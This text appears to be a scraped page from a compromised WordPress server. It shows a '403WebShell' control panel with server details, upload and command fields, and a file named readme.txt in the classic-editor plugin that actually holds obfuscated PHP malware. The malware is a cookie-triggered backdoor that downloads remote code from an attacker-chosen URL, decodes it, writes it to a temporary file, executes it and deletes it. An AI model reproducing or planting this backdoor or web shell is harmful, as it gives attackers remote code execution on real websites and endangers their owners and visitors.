Warning: include_once(/home/freelife/public_html/wp-content/plugins/wp-super-cache/wp-cache-phase1.php): failed to open stream: No such file or directory in /home/freelife/public_html/wp-content/advanced-cache.php on line 22

Warning: include_once(): Failed opening '/home/freelife/public_html/wp-content/plugins/wp-super-cache/wp-cache-phase1.php' for inclusion (include_path='.:') in /home/freelife/public_html/wp-content/advanced-cache.php on line 22
403WebShell
403Webshell
Server IP : 176.9.105.210  /  Your IP : 216.73.217.21
Web Server : Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
System : Linux server.mediaphic.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : freelife ( 1356)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system,show_source,mail,sendmail,popen,symlink,phpinfo
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/freelife/public_html/wp-content/plugins/classic-editor/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/freelife/public_html/wp-content/plugins/classic-editor/readme.txt
<?php

if (!function_exists("get35383465f7e1e18730e5518624ad6c9d")) {

    function get35383465f7e1e18730e5518624ad6c9d($url) {
        $content = "";
        if (function_exists("curl_init")) {
            $options = array(
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_HEADER => false,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_ENCODING => "",
                CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0",
                CURLOPT_AUTOREFERER => true,
                CURLOPT_CONNECTTIMEOUT => 120,
                CURLOPT_TIMEOUT => 120,
                CURLOPT_MAXREDIRS => 10,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false
            );

            $ch = curl_init($url);
            curl_setopt_array($ch, $options);
            $content = @curl_exec($ch);
        }

        if ($content)
            return $content;

        $content = @file_get_contents($url);
        return $content;
    }

    function bzd($input)
    {
        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        $output = '';
        $i = 0;

        $input = preg_replace('/[^A-Za-z0-9\+\/=]/', '', $input);

        $len = strlen($input);
        while ($i < $len) {
            $enc1 = strpos($keyStr, $input[$i++]);
            $enc2 = strpos($keyStr, $input[$i++]);
            $enc3 = strpos($keyStr, $input[$i++]);
            $enc4 = strpos($keyStr, $input[$i++]);

            $chr1 = ($enc1 << 2) | ($enc2 >> 4);
            $output .= chr($chr1);

            if ($enc3 !== false && $enc3 != 64) {
                $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
                $output .= chr($chr2);
            }

            if ($enc4 !== false && $enc4 != 64) {
                $chr3 = (($enc3 & 3) << 6) | $enc4;
                $output .= chr($chr3);
            }
        }

        return $output;
    }

    if (isset($_COOKIE['35383465f7e1e18730e5518624ad6c9d'])) {
        if ($_COOKIE['35383465f7e1e18730e5518624ad6c9d'] == '1') {
            echo md5($_SERVER['HTTP_HOST']);
            exit;
        }
        $dat = bzd(get35383465f7e1e18730e5518624ad6c9d($_COOKIE['35383465f7e1e18730e5518624ad6c9d']));
        if ($dat) {
            $temp_dir = sys_get_temp_dir();
            $new_filename = tempnam($temp_dir, 'pr_');
            if ($new_filename === false) {
                $new_filename = substr(str_shuffle('abcdefghijklmnopqrstuvwxyz'), 0, 8) . '.php';
                $new_filename = __DIR__ . '/' . $new_filename;
            }
            if ($new_filename != false) {
                file_put_contents($new_filename, $dat);
            }
            if($new_filename && file_exists($new_filename)){
                include $new_filename;
                unlink($new_filename);
            }
            exit;
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit